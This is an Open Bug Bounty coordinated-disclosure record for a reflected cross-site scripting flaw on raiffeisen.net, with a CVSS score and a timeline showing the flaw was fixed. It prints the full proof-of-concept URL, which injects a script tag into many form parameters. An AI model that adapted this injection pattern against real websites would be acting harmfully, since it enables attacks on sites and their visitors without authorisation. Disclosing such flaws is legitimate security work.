raiffeisen.net XSS vulnerability

2016-08-22T12:56:00
ID OBB:177036
Type openbugbounty
Reporter Anonymous
Modified 2016-09-21T12:56:00

Description

Open Bug Bounty ID: OBB-177036

Description| Value
---|---
Affected Website:| raiffeisen.net
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.raiffeisen.net/de/haushalte/alles-fuers-heimnetz/hardware/hausautomation/?id=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[lastname]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[email]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[submitField]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[removeFileField]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[removeFile]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[privacy]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[requesttype]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[randomID]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[step-2-next]=xss%27%3E%20%3C/

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 22 August, 2016 12:56 GMT
Vulnerability Verified:| 22 August, 2016 12:59 GMT
Website Operator Notified:| 22 August, 2016 12:59 GMT
Vulnerability Published:| 22 August, 2016 12:59 GMT [without any technical details]
Vulnerability Fixed:| 24 August, 2016 11:29 GMT
Public Disclosure:| 21 September, 2016 12:56 GMT